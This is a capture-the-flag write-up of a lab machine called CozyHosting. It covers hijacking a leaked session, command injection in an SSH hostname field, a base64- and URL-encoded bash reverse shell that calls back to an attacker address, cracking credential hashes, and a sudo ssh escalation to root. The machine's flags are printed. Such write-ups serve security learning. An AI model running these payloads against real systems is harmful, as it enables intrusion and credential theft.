Write-up author: jon-brandy
- Accessing postgres
PORT SCANNING
┌──(brandy㉿bread-yolk)-[~]
└─$ nmap -p- -sVC 10.10.11.230 --min-rate 1000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-30 22:59 PDT
Nmap scan report for 10.10.11.230
Host is up (0.032s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_ 256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds
- Based from the nmap results, the machine runs a webapp and opens ssh logins.
WEBAPP
- The wappalyzer itself shows us minimum info (for version).
- Hence i ran dirsearch to list all directories or files available for this webapp.
RESULTS
admin
page andactuator
directory should be our interest here.- Opens
actuator/sessions
shall resulting to this:
- Noticed there's a user session with name
kanderson
(Informatin Disclosure). - Let's change our session to kanderson's, then refresh the page.
RESULT
- Scrolling down you shall see an input box.
- This should be our interest. To identify what's the vuln, let's capture the request we send using burpsuite.
- Let's just fill the hostname with our tun0 interface and leave username empty, we just want to know what response might the server give.
IN BURPSUITE
- Noticed the server responds an error for the ssh command.
- This make it clear, that the vuln should be related to command injection.
- The idea is using basic bash reverse shell payload:
BASH REVERSE SHELL PAYLOAD
bash -i >& /dev/tcp/10.10.16.14/1337 0>&1
ENCODE IT TO BASE64 (adding -w 0, to make sure the output is a single line command)
echo "bash -i >& /dev/tcp/10.10.16.14/1337 0>&1" | base64 -w 0
RESULT
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK
- Great! Now for the final payload, because we want the server to decode our payload first then execute it, hence we use
base64 -d
. - But again, we need to encode it again with
url-encode
to terminate all the spaces. - The best practice is to use -->
${IFS%??}
to avoid spaces or other characters that may be treated as delimiters by the shell. - Then we url-encode the payload, set listener and send our payload.
PAYLOAD
Original one:
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK" | base64 -d | bash;
Adding ${IFS%??} to covering whitespaces
;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA+JjEK"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;
URL-ENCODE:
%3Becho%24%7BIFS%25%3F%3F%7D%22YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xNC8xMzM3IDA%2BJjEK%22%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D%2Dd%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash%3B
RESULT
- At this point we can't get user flag, because we're not having the shell as "josh".
- Noticed there's a .jar file which might be our interest.
- Let's setup a python server at the remote server and download the file to our local machine.
RESULT
- Well if you noticed, it failed to download it full.
- Hmm, confused here, but anyway since we opens python server at port 8000, accessing the remote host with port 8000 shall shown this:
- Let's download it manually.
DECOMPILING IT WITH JD-GUI
- Interesting, we found a postgres cred.
- Let's access
psql
at the remote server.
- Run -->
\l
to list all the databases available.
- Great! Let's connect to
cozyhosting
--> run\c cozyhosting
. - To dump all the tables run ->
\d
.
DUMPING users column.
- Interesting, users table should be our interest. Let's select all from it.
SELECT * FROM public.users;
30 Awesome! Let's crack all the hashed password with john.
31. I started to cracking the first hash with john and while waiting for john to cracks hash, I identify the hash using hashid
, which allows to use hashcat.
- Because time is money 🙏🏼.
GRABBING THE HASHCAT CODE FOR BCRYPT.
- Found nothing for the kanderson's hash.
- But succeed cracks the password for admin's hash.
- Hmm.. Remembering our remote /home dir is josh, we make an interpretes of potential password reuse.
- Turns out it is.
RESULT
GETTING USER FLAG
83cfd0650592f468972d63e44761211a
- Checking sudo permissions for josh resulting to this:
- ssh command is being run as root.
- Diving on the internet and searching for
ssh gtfobins
exploit, shall resulting to this -->https://gtfobins.github.io/gtfobins/ssh/
- Using it.
- Successfully gained root!
GETTING ROOT FLAG
5783572fa5559507b67cfbd6636c934e